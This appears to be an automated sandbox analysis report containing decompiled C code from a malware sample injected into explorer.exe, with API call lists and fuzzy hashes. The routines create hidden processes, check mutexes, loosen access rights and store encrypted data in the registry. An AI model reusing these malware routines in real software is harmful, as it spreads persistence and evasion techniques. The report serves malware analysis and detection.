                            						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
                            						__eflags = _t129;
                            						if(_t129 != 0) {
                            							_t91 = _v16;
                            							goto L16;
                            						}
                            						_v12 = _t176;
                            						_t131 =  *0x9e68c; // 0x286fab8
                            						_v8 = 0x80000003;
                            						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
                            						__eflags = _v12 - _t177;
                            						if(_v12 == _t177) {
                            							L21:
                            							E000885C2( &_v16);
                            							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
                            							__eflags = _t96;
                            							if(_t96 == 0) {
                            								_t97 = _a8;
                            								__eflags = _t97;
                            								if(_t97 != 0) {
                            									 *_t97 = 1;
                            								}
                            								_push(_v28);
                            								L30:
                            								_t98 =  *0x9e68c; // 0x286fab8
                            								 *((intOrPtr*)(_t98 + 0x1c))();
                            								_t155[0x43] = _v8;
                            								_t101 = E0008C379(_t177);
                            								 *_t155 = _t101;
                            								__eflags = _t101;
                            								if(_t101 == 0) {
                            									L32:
                            									E0008861A( &_v20, 0xffffffff);
                            									return _t155;
                            								} else {
                            									goto L31;
                            								}
                            								do {
                            									L31:
                            									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
                            									_t176 = _t176 + 1;
                            									__eflags = _t176 -  *_t155;
                            								} while (_t176 <  *_t155);
                            								goto L32;
                            							}
                            							_v16 = _t176;
                            							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
                            							__eflags = _t111;
                            							if(_t111 == 0) {
                            								_t112 = _a8;
                            								__eflags = _t112;
                            								if(_t112 != 0) {
                            									 *_t112 = _t176;
                            								}
                            								_push(_v16);
                            								goto L30;
                            							}
                            							L23:
                            							E0008861A( &_v44, 0x110);
                            							memset( &_v108, _t176, 0x40);
                            							E0008861A( &_v20, 0xffffffff);
                            							goto L1;
                            						}
                            						_push(_t176);
                            						_push(_v16);
                            						_t178 = "\\";
                            						_push(_t178);
                            						_t133 = E00089292(_v12);
                            						_t181 = _t181 + 0x10;
                            						_v40 = _t133;
                            						__eflags = _t133;
                            						if(_t133 == 0) {
                            							goto L23;
                            						}
                            						_t134 =  *0x9e68c; // 0x286fab8
                            						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
                            						__eflags = _t135;
                            						if(_t135 == 0) {
                            							_t136 =  *0x9e68c; // 0x286fab8
                            							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
                            						} else {
                            							_t143 = E000895E1( &_v36, 0x34);
                            							_v24 = _t143;
                            							_t179 = E000892E5(_v32);
                            							_v32 = _t179;
                            							E000885D5( &_v24);
                            							_t183 = _t181 + 0x18;
                            							_t147 = E00089256(_v12);
                            							_v24 = _t147;
                            							_t148 =  *0x9e68c; // 0x286fab8
                            							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
                            							__eflags = _t149;
                            							if(_t149 == 0) {
                            								_t154 = _a12;
                            								__eflags = _t154;
                            								if(_t154 != 0) {
                            									 *_t154 = 1;
                            								}
                            							}
                            							E0008861A( &_v32, 0xfffffffe);
                            							E0008861A( &_v24, 0xfffffffe);
                            							_t181 = _t183 + 0x10;
                            							_t178 = "\\";
                            						}
                            						_t139 = E00089292(_v12);
                            						_t171 =  *0x9e684; // 0x286f8f0
                            						_t181 = _t181 + 0x18;
                            						_t177 = _t139;
                            						_v20 = _t177;
                            						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
                            						E0008861A( &_v40, 0xffffffff);
                            						goto L21;
                            					}
                            				}
                            				L1:
                            				return 0;
                            			}




















































                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                            • Opcode Fuzzy Hash: e334c5ee5511fffd280dad1b434540434d102184dc43e0ee245e387017bf4914
                            • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            [Control-flow graph for function 0008A911: image not reproduced]
                            C-Code - Quality: 66%
                            			E0008A911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
                            				struct _PROCESS_INFORMATION _v20;
                            				struct _STARTUPINFOW _v92;
                            				signed int _t24;
                            				intOrPtr _t30;
                            				intOrPtr _t32;
                            				intOrPtr _t34;
                            				int _t42;
                            				WCHAR* _t44;
                            
                            				_t42 = 0x44;
                            				memset( &_v92, 0, _t42);
                            				_v92.cb = _t42;
                            				asm("stosd");
                            				_t44 = 1;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t24 = _a16;
                            				if(_t24 != 0) {
                            					_v92.dwFlags = 1;
                            					_v92.wShowWindow = 0;
                            				}
                            				asm("sbb eax, eax");
                            				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
                            					_t44 = 0;
                            				} else {
                            					if(_a8 != 0) {
                            						_push(_a12);
                            						_t34 =  *0x9e684; // 0x286f8f0
                            						_push(_v20.hProcess);
                            						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
                            							GetExitCodeProcess(_v20.hProcess, _a8);
                            						}
                            					}
                            					_t30 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
                            					_t32 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t32 + 0x30))(_v20);
                            				}
                            				return _t44;
                            			}












                            APIs
                            • memset.MSVCRT ref: 0008A925
                            • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,0008C1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0008A96C
                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0008A990
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CodeCreateExitmemset
                            • String ID:
                            • API String ID: 4170947310-0
                            • Opcode ID: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction ID: 69c2d589c2e0a2c9629c015d340a78d4e10d2ecd89ef4d1a65b39d481363986c
                            • Opcode Fuzzy Hash: 225cfbb69293b3eed798390d4c55be612c5650c273af84687da85cfb64abf4ec
                            • Instruction Fuzzy Hash: C0215C72A00118BFEF519FA9DC84EAFBBBCFF08380B014426FA55E6560D6349C00CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _t12;
                            				void* _t20;
                            				void* _t22;
                            				union _TOKEN_INFORMATION_CLASS _t28;
                            				void* _t31;
                            
                            				_push(_t22);
                            				_push(_t22);
                            				_t31 = 0;
                            				_t28 = __edx;
                            				_t20 = _t22;
                            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                            					L6:
                            					_t12 = _t31;
                            				} else {
                            					_t31 = E00088604(_v8);
                            					_v12 = _t31;
                            					if(_t31 != 0) {
                            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                            							goto L6;
                            						} else {
                            							E0008861A( &_v12, _t16);
                            							goto L3;
                            						}
                            					} else {
                            						L3:
                            						_t12 = 0;
                            					}
                            				}
                            				return _t12;
                            			}











                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                            • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocateErrorHeapLast
                            • String ID:
                            • API String ID: 2499131667-0
                            • Opcode ID: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                            • Opcode Fuzzy Hash: 650567714d9fdc1599f1fac20ccfc2e022df248ce6cf550bc0370b11c879f389
                            • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
                            				intOrPtr _t10;
                            				void* _t13;
                            				void* _t19;
                            				signed int _t21;
                            				signed int _t22;
                            
                            				_t13 = __edx;
                            				if(__ecx != 0) {
                            					_t22 = 0;
                            					_t19 = CreateMutexA(0, 1, __ecx);
                            					if(_t19 != 0) {
                            						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
                            							_t22 = 1;
                            							 *_a4 = _t19;
                            						} else {
                            							_t10 =  *0x9e684; // 0x286f8f0
                            							 *((intOrPtr*)(_t10 + 0x30))(_t19);
                            						}
                            					} else {
                            						GetLastError();
                            						_t22 = 0xffffffff;
                            					}
                            				} else {
                            					_t22 = _t21 | 0xffffffff;
                            				}
                            				return _t22;
                            			}









                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                            • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateErrorLastMutex
                            • String ID:
                            • API String ID: 1925916568-0
                            • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                            • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                            • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0008A471(CHAR* __ecx, void* __edx) {
                            				intOrPtr _t8;
                            				void* _t16;
                            				void* _t17;
                            
                            				_t16 = __edx; // executed
                            				_t17 = CreateMutexA(0, 1, __ecx);
                            				if(_t17 != 0) {
                            					if(GetLastError() == 0xb7 && E0008A4BF(_t17, _t16) < 0) {
                            						_t8 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t8 + 0x30))(_t17);
                            						_t17 = 0;
                            					}
                            					return _t17;
                            				}
                            				GetLastError();
                            				return 0;
                            			}







                            APIs
                            • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,00084E14,00000000), ref: 0008A47F
                            • GetLastError.KERNEL32 ref: 0008A48B
                            • GetLastError.KERNEL32 ref: 0008A495
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CreateMutex
                            • String ID:
                            • API String ID: 200418032-0
                            • Opcode ID: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction ID: e0de8723e9178c59a55691960d7167cf6849532d0ff7e7a54eb44961aa7457b0
                            • Opcode Fuzzy Hash: d451146697d2d7be7ee239c6e2cf6256a97e20a24ce2cfbe4ac2cdb7fc53f4f3
                            • Instruction Fuzzy Hash: 19F0E5323000209BFA2127A4D84CB5F3695FFDA7A0F025463F645CB621EAECCC0683B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E00086DA0(void* __eflags, void* __fp0) {
                            				short _v536;
                            				WCHAR* _v544;
                            				WCHAR* _t9;
                            				intOrPtr _t10;
                            				intOrPtr _t11;
                            				void* _t22;
                            				void* _t32;
                            				intOrPtr _t34;
                            				intOrPtr _t35;
                            				intOrPtr _t41;
                            				intOrPtr _t43;
                            				intOrPtr _t46;
                            				intOrPtr _t49;
                            				void* _t51;
                            				void* _t53;
                            				void* _t56;
                            				WCHAR* _t59;
                            				signed int _t60;
                            				void* _t62;
                            				void* _t63;
                            				void* _t74;
                            
                            				_t74 = __fp0;
                            				_t34 =  *0x9e778; // 0x286fc18
                            				_t62 = (_t60 & 0xfffffff8) - 0x21c;
                            				_t51 = 0x31;
                            				_t32 = 1; // executed
                            				_t9 = E00089ED0(_t34, _t51); // executed
                            				if(_t9 != 0) {
                            					_t10 =  *0x9e78c; // 0x0
                            					_t66 = _t10;
                            					if(_t10 == 0) {
                            						_t49 =  *0x9e688; // 0xb0000
                            						_t10 = E0008EDCF(_t49 + 0xb0, _t51, _t66);
                            						 *0x9e78c = _t10;
                            					}
                            					_push(0);
                            					_push(_t10);
                            					_t11 =  *0x9e688; // 0xb0000
                            					_push(L"\\c");
                            					_t9 = E000892E5(_t11 + 0x438);
                            					_t59 = _t9;
                            					_t63 = _t62 + 0x10;
                            					_v544 = _t59;
                            					if(_t59 != 0) {
                            						while(1) {
                            							_t35 =  *0x9e688; // 0xb0000
                            							_t56 = E0008A471(_t35 + 0x1878, 0x1388);
                            							if(_t56 == 0) {
                            								break;
                            							}
                            							if(E0008B269(_t59) == 0) {
                            								_t32 = E0008F14F(_t59, 0x1388, _t74);
                            							}
                            							E0008A4DB(_t56);
                            							_t41 =  *0x9e684; // 0x286f8f0
                            							 *((intOrPtr*)(_t41 + 0x30))(_t56);
                            							if(_t32 > 0) {
                            								E0008980C( &_v544);
                            								_t43 =  *0x9e778; // 0x286fc18
                            								_t53 = 0x33;
                            								if(E00089ED0(_t43, _t53) != 0) {
                            									L12:
                            									__eflags = E00081C68(_t59, __eflags, _t74);
                            									if(__eflags >= 0) {
                            										E0008B1B1(_t59, _t53, __eflags, _t74);
                            										continue;
                            									}
                            								} else {
                            									_t46 =  *0x9e778; // 0x286fc18
                            									_t53 = 0x12;
                            									_t22 = E00089ED0(_t46, _t53);
                            									_t72 = _t22;
                            									if(_t22 != 0 || E0008A4EF(_t53, _t72) != 0) {
                            										_push(E0008980C(0));
                            										E00089640( &_v536, 0x104, L"%s.%u", _t59);
                            										_t63 = _t63 + 0x14;
                            										MoveFileW(_t59,  &_v536);
                            										continue;
                            									} else {
                            										goto L12;
                            									}
                            								}
                            							}
                            							break;
                            						}
                            						_t9 = E0008861A( &_v544, 0xfffffffe);
                            					}
                            				}
                            				return _t9;
                            			}

























                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileMove
                            • String ID: %s.%u
                            • API String ID: 3562171763-1288070821
                            • Opcode ID: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction ID: a5438fa8a69558a9aa6e28972bce87c3de03cd7a9a26965d290b63cd5faf2151
                            • Opcode Fuzzy Hash: 145fbccc19de6f84cb15eafbd303f16f7ff4395e4da0511b1ac9a676e779d8cf
                            • Instruction Fuzzy Hash: FE31EF753043105AFA54FB74DC86ABE3399FB90750F14002AFA828B283EF26CD01C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E00082AEA() {
                            				intOrPtr _v8;
                            				signed int _v12;
                            				CHAR* _v16;
                            				signed int _t16;
                            				intOrPtr _t21;
                            				intOrPtr _t22;
                            				void* _t26;
                            				void* _t29;
                            				signed int _t31;
                            				intOrPtr _t36;
                            				CHAR* _t38;
                            				intOrPtr _t39;
                            				void* _t40;
                            
                            				_t15 =  *0x9e710 * 0x64;
                            				_t39 = 0;
                            				_v12 =  *0x9e710 * 0x64;
                            				_t16 = E00088604(_t15);
                            				_t38 = _t16;
                            				_v16 = _t38;
                            				if(_t38 != 0) {
                            					_t31 =  *0x9e710; // 0x2
                            					_t36 = 0;
                            					_v8 = 0;
                            					if(_t31 == 0) {
                            						L9:
                            						_push(_t38);
                            						E00089F48(0xe); // executed
                            						E0008861A( &_v16, _t39);
                            						return 0;
                            					}
                            					_t29 = 0;
                            					do {
                            						_t21 =  *0x9e714; // 0x286fe88
                            						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                            							if(_t39 != 0) {
                            								lstrcatA(_t38, "|");
                            								_t39 = _t39 + 1;
                            							}
                            							_t22 =  *0x9e714; // 0x286fe88
                            							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                            							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                            							_t26 = E00089601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                            							_t31 =  *0x9e710; // 0x2
                            							_t40 = _t40 + 0x18;
                            							_t36 = _v8;
                            							_t39 = _t39 + _t26;
                            						}
                            						_t36 = _t36 + 1;
                            						_t29 = _t29 + 0x20;
                            						_v8 = _t36;
                            					} while (_t36 < _t31);
                            					goto L9;
                            				}
                            				return _t16 | 0xffffffff;
                            			}

















                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • lstrcatA.KERNEL32(00000000,0009B9A0,0008573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,0008573E), ref: 00082B3D
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcat
                            • String ID: %u;%u;%u
                            • API String ID: 3011335133-2973439046
                            • Opcode ID: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
                            • Opcode Fuzzy Hash: eab92ba541ef69d11a41f8a26aea91d5717be5c217cb7186b74a332a00d51514
                            • Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0008BD10() {
                            				char _v8;
                            				void* _v12;
                            				char _v16;
                            				short _v20;
                            				char _v24;
                            				short _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				intOrPtr _v88;
                            				intOrPtr _v92;
                            				void _v96;
                            				intOrPtr _t58;
                            				intOrPtr _t61;
                            				intOrPtr _t63;
                            				intOrPtr _t65;
                            				intOrPtr _t67;
                            				intOrPtr _t70;
                            				intOrPtr _t73;
                            				intOrPtr _t77;
                            				intOrPtr _t79;
                            				intOrPtr _t81;
                            				intOrPtr _t85;
                            				intOrPtr _t87;
                            				signed int _t90;
                            				void* _t92;
                            				intOrPtr _t93;
                            				void* _t98;
                            
                            				_t90 = 8;
                            				_v28 = 0xf00;
                            				_v32 = 0;
                            				_v24 = 0;
                            				memset( &_v96, 0, _t90 << 2);
                            				_v20 = 0x100;
                            				_push( &_v12);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_v16 = 0;
                            				_push(0);
                            				_v8 = 0;
                            				_push(1);
                            				_v12 = 0;
                            				_push( &_v24);
                            				_t58 =  *0x9e68c; // 0x286fab8
                            				_t98 = 0;
                            				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                            					L14:
                            					if(_v8 != 0) {
                            						_t67 =  *0x9e68c; // 0x286fab8
                            						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                            					}
                            					if(_v12 != 0) {
                            						_t65 =  *0x9e68c; // 0x286fab8
                            						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                            					}
                            					if(_t98 != 0) {
                            						_t63 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                            					}
                            					if(_v16 != 0) {
                            						_t61 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                            					}
                            					L22:
                            					return _t98;
                            				}
                            				_v68 = _v12;
                            				_t70 =  *0x9e688; // 0xb0000
                            				_t92 = 2;
                            				_v96 = 0x1fffff;
                            				_v92 = 0;
                            				_v88 = 3;
                            				_v76 = 0;
                            				_v72 = 5;
                            				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                            					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                            						goto L7;
                            					}
                            					goto L4;
                            				} else {
                            					L4:
                            					_push( &_v8);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(1);
                            					_push(_t92);
                            					_push(_t92);
                            					_push( &_v32);
                            					_t85 =  *0x9e68c; // 0x286fab8
                            					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                            						goto L14;
                            					} else {
                            						_t87 = _v8;
                            						if(_t87 != 0) {
                            							_push(2);
                            							_pop(1);
                            							_v64 = 0x1fffff;
                            							_v60 = 1;
                            							_v56 = 3;
                            							_v44 = 0;
                            							_v40 = 1;
                            							_v36 = _t87;
                            						}
                            						L7:
                            						_push( &_v16);
                            						_push(0);
                            						_push( &_v96);
                            						_t73 =  *0x9e68c; // 0x286fab8
                            						_push(1); // executed
                            						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                            							goto L14;
                            						}
                            						_t98 = LocalAlloc(0x40, 0x14);
                            						if(_t98 == 0) {
                            							goto L14;
                            						}
                            						_t93 =  *0x9e68c; // 0x286fab8
                            						_push(1);
                            						_push(_t98);
                            						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                            							goto L14;
                            						}
                            						_t77 =  *0x9e68c; // 0x286fab8
                            						_push(0);
                            						_push(_v16);
                            						_push(1);
                            						_push(_t98);
                            						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                            							goto L14;
                            						}
                            						if(_v8 != 0) {
                            							_t81 =  *0x9e68c; // 0x286fab8
                            							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                            						}
                            						_t79 =  *0x9e68c; // 0x286fab8
                            						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                            						goto L22;
                            					}
                            				}
                            			}


                            APIs
                            • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocEntriesLocal
                            • String ID:
                            • API String ID: 2146116654-0
                            • Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
                            • Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
                            • Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E0008A0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
                            				char* _v12;
                            				char _v16;
                            				int _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				char* _v32;
                            				char _v52;
                            				char _v64;
                            				char _v328;
                            				char _v2832;
                            				signed int _t48;
                            				signed int _t49;
                            				char* _t54;
                            				long _t73;
                            				long _t80;
                            				long _t83;
                            				intOrPtr _t84;
                            				void* _t88;
                            				char* _t89;
                            				intOrPtr _t90;
                            				void* _t103;
                            				void* _t104;
                            				char* _t106;
                            				intOrPtr _t107;
                            				char _t108;
                            
                            				_t48 = __ecx;
                            				_t89 = __edx;
                            				_v24 = __ecx;
                            				if(_a4 == 0 || _a8 == 0) {
                            					L13:
                            					_t49 = _t48 | 0xffffffff;
                            					__eflags = _t49;
                            					return _t49;
                            				} else {
                            					_t115 = __edx;
                            					if(__edx == 0) {
                            						goto L13;
                            					}
                            					_t107 =  *((intOrPtr*)(__ecx + 0x108));
                            					_push(_t107);
                            					_t103 = 4;
                            					_v12 = __edx;
                            					_v28 = E0008D400( &_v12, _t103);
                            					_t93 = _t107 + __edx;
                            					E00092301(_t107 + __edx,  &_v2832);
                            					_t54 = E0009242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
                            					_t108 = _a8;
                            					_v12 = _t54;
                            					_v20 = _t54 + 6 + _t108;
                            					_t106 = E00088604(_t54 + 6 + _t108);
                            					_v32 = _t106;
                            					if(_t106 != 0) {
                            						 *_t106 = _a12;
                            						_t16 =  &(_t106[6]); // 0x6
                            						_t106[1] = 1;
                            						_t106[2] = _t108;
                            						E000886E1(_t16, _a4, _t108);
                            						_t21 = _t108 + 6; // 0x6
                            						E000922D3( &_v2832, _t21 + _t106, _v12);
                            						_v16 = _t89;
                            						_t90 = _v24;
                            						_v12 =  *((intOrPtr*)(_t90 + 0x108));
                            						_push( &_v52);
                            						_t104 = 8;
                            						E0008F490( &_v16, _t104);
                            						E0008EAC1( &_v16,  &_v52, 0x14,  &_v328);
                            						E0008EB2E(_t106, _v20,  &_v328);
                            						_t73 = E00089B0E(_t90);
                            						_v12 = _t73;
                            						__eflags = _t73;
                            						if(_t73 != 0) {
                            							E000897A0(_v28,  &_v64, 0x10);
                            							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
                            							__eflags = _t80;
                            							if(_t80 == 0) {
                            								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
                            								__eflags = _t83;
                            								if(_t83 != 0) {
                            									_push(0xfffffffc);
                            									_pop(0);
                            								}
                            								_t84 =  *0x9e68c; // 0x286fab8
                            								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
                            							} else {
                            								_push(0xfffffffd);
                            								_pop(0);
                            							}
                            							E0008861A( &_v12, 0xffffffff);
                            						}
                            						E0008861A( &_v32, 0);
                            						return 0;
                            					}
                            					_t88 = 0xfffffffe;
                            					return _t88;
                            				}
                            			}


                            APIs
                              • Part of subcall function 0009242D: _ftol2_sse.MSVCRT ref: 0009248E
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 0008A1DE
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapOpen_ftol2_sse
                            • String ID:
                            • API String ID: 3756893521-0
                            • Opcode ID: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction ID: 678beb8ec0cb8c060cb6281312f41271aa2b36fb26bfbf1ebb42210e6552e48b
                            • Opcode Fuzzy Hash: ceb7e804541080db6b3cb85923b363ab7d14183699dbb7a162a48657ba5fffad
                            • Instruction Fuzzy Hash: 7551B372A00209BBDF20EF94DC41FDEBBB8BF05320F108166F555A7291EB749644CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
